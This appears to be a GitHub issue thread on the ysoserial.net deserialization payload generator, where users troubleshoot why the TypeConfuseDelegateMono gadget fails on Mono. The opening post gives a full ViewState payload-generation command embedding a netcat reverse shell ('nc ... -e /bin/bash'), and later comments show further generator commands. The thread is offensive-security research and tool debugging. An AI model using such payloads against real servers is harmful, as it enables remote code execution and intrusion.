search

pwntester / ysoserial.net

Deserialization payload generator for a variety of .NET formatters
MIT License
3.18k stars 468 forks source link

Payload for Mono not working #86

Closed halfluke closed 2 years ago

halfluke commented 4 years ago

Hi.

Any idea why the typeconfusedelegatemono doesn't work for me?

I built the supersimple example from https://www.monodevelop.com/documentation/creating-aspnet-projects/ and I run it in xsp4, but the viewstate - which should be MAC enabled but not encrypted, .net 4.0 version, looks weird and the payload generated by ysoserial.net - which is much longer - does not work. I'm using a specific validationkey in web.config for testing.

%2FwEMDAwQAgAADgEMBQMMEAIAAA4BDAUBDBACDA8BAQRUZXh0AQ5Zb3UgY2xpY2tlZCBtZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALvN0281sXomxFcIhy33ycX5EfZiafqaB78GIBHdjmVX

Mono Version Information: 6.10.0.104 (tarball Fri Jun 26 19:38:24 UTC 2020); ASP.NET Version: 4.0.30319.42000

Payload generated with: ./ysoserial.exe -p ViewState -g TypeConfuseDelegateMono -c "nc 127.0.0.1 555 -e /bin/bash" --path="/Default.aspx" --apppath="/" --islegacy --validationalg="SHA1" --validationkey="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" --isdebug

irsdl commented 4 years ago

I can recreate this issue but I don't know how to debug it properly. It seems that it does not also understand ViewStateEncryptionMode="Never" also the following does not disable the MAC validation:

<appSettings>
      <add key="aspnet:AllowInsecureDeserialization" value="true" />
</appSettings>

I am not exactly sure why but it would be great if someone with more information can help here.

sushantdhopat commented 3 years ago

where is it ./ysoserial.exe file in this tool i didnt get

gogo2464 commented 3 years ago

I have got the same troublewith the command .\ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -o raw -c "calc" -t. A sound is produced but no calc appears.

@sushantdhopat19 ./ysoserial.exe is the compiled binary. To get it I launched ysoserial.sln and build from visual studio.

This commit used to work: https://github.com/pwntester/ysoserial.net/commit/138e21649b9b3977b95f7d3c42e637e17861598c as told in this post. I think Mono has been updated and the gadget is not valuable anymore.

This article may help: https://i.blackhat.com/us-18/Thu-August-9/us-18-Haken-Automated-Discovery-of-Deserialization-Gadget-Chains.pdf

gogo2464 commented 3 years ago

I will get a look at the gadgets. Assign me please. But continue to notify me if somebody wants to make a PR too. I may take a long time.

gogo2464 commented 3 years ago

I order to locate the trouble I made a tiny vulnerable program. THen I put a file \ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -o raw -c "calc" > tmp.dat

EDIT When I deserialize, I get the following: END OF EDIT

Binary stream '0' does not contain a valid BinaryHeader. Possible causes are invalid stream or object version change between serialization and deserialization.

It is useful to find the right gadget.

gogo2464 commented 3 years ago

I have found a good article online. I will read it: https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html

gogo2464 commented 3 years ago

@halfluke can you just tell me if you have the same symptom with the calc please?

halfluke commented 3 years ago

I can't confirm about the calc because I tried to generate a payload for linux. How would I test a calc payload if it has to run under linux?

gogo2464 commented 3 years ago

@halfluke try another command like .\ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -o raw -c "touch file.txt" -t

gogo2464 commented 3 years ago

I found on internet an article of how this code was built: http://muffsec.com/blog/?p=585

gogo2464 commented 3 years ago

In my opinion the code used to be very near from this code : http://muffsec.com/blog/?p=585 but now SessionSecurityToken has been removed from https://docs.microsoft.com/en-us/dotnet/api/system.identitymodel.tokens.sessionsecuritytoken?view=netframework-4.8 and the gadget did not work anymore. The modification might have been removed from the history and might have not been replaced yet.

EDIT: I was wrong the package is still avaible in nuget. See: https://stackoverflow.com/questions/19797557/add-a-reference-to-the-system-identitymodel-tokens-dll But is it present on Mono? I am going to dig.

EDIT: I need an older mono version to test. The newer version of mono.

The code from muffsec works on my machine now. I needed to use old .net framework: https://stackoverflow.com/questions/19797557/add-a-reference-to-the-system-identitymodel-tokens-dll.

Sadly I just realise it was the code for TypeConfuseDelegate. Not TypeConfuseDelegateMono. I have to dig deeper and deeper.

gogo2464 commented 3 years ago

I am going to try to compile with mono to check the payload.

halfluke commented 3 years ago

Sorry, I do not have time to test much at the moment. Thank you for your efforts.

irsdl commented 2 years ago

It should work in the latest version now (download it from https://github.com/mono/mono/actions)

gogo2464 commented 4 months ago

I still have an error.

PS C:\Users\ME\Desktop> ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -c calc.exe -t

Exception non gérée : System.NullReferenceException: La référence d'objet n'est pas définie à une instance d'un objet.
   à ysoserial.Generators.TypeConfuseDelegateMonoGenerator.TypeConfuseDelegateGadget(InputArgs inputArgs) dans D:\a\ysoserial.net\ysoserial.net\ysoserial\Generators\TypeConfuseDelegateMonoGenerator.cs:ligne 83
   à ysoserial.Generators.TypeConfuseDelegateMonoGenerator.Generate(String formatter, InputArgs inputArgs) dans D:\a\ysoserial.net\ysoserial.net\ysoserial\Generators\TypeConfuseDelegateMonoGenerator.cs:ligne 43
   à ysoserial.Generators.GenericGenerator.GenerateWithInit(String formatter, InputArgs inputArgs) dans D:\a\ysoserial.net\ysoserial.net\ysoserial\Generators\GenericGenerator.cs:ligne 75
   à ysoserial.Program.Main(String[] args) dans D:\a\ysoserial.net\ysoserial.net\ysoserial\Program.cs:ligne 302
>

it is not my path also.

gogo2464 commented 4 months ago

I installed Unity 2021.3.37f1 on windows 11.

Then I did git clone https://github.com/pwntester/ysoserial.net/. Then I built from visual studio. 

.\Debug\ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegateMono -c calc.exe

Exception non gérée : System.NullReferenceException: La référence d'objet n'est pas définie à une instance d'un objet.
   à ysoserial.Generators.TypeConfuseDelegateMonoGenerator.TypeConfuseDelegateGadget(InputArgs inputArgs) dans C:\Users\ME\Desktop\ysoserial.net\ysoserial\Generators\TypeConfuseDelegateMonoGenerator.cs:ligne 84
   à ysoserial.Generators.TypeConfuseDelegateMonoGenerator.Generate(String formatter, InputArgs inputArgs) dans C:\Users\ME\Desktop\ysoserial.net\ysoserial\Generators\TypeConfuseDelegateMonoGenerator.cs:ligne 43
   à ysoserial.Generators.GenericGenerator.GenerateWithInit(String formatter, InputArgs inputArgs) dans C:\Users\ME\Desktop\ysoserial.net\ysoserial\Generators\GenericGenerator.cs:ligne 75
   à ysoserial.Program.Main(String[] args) dans C:\Users\ME\Desktop\ysoserial.net\ysoserial\Program.cs:ligne 302
gogo2464 commented 4 months ago

Do you need the english for the terminal?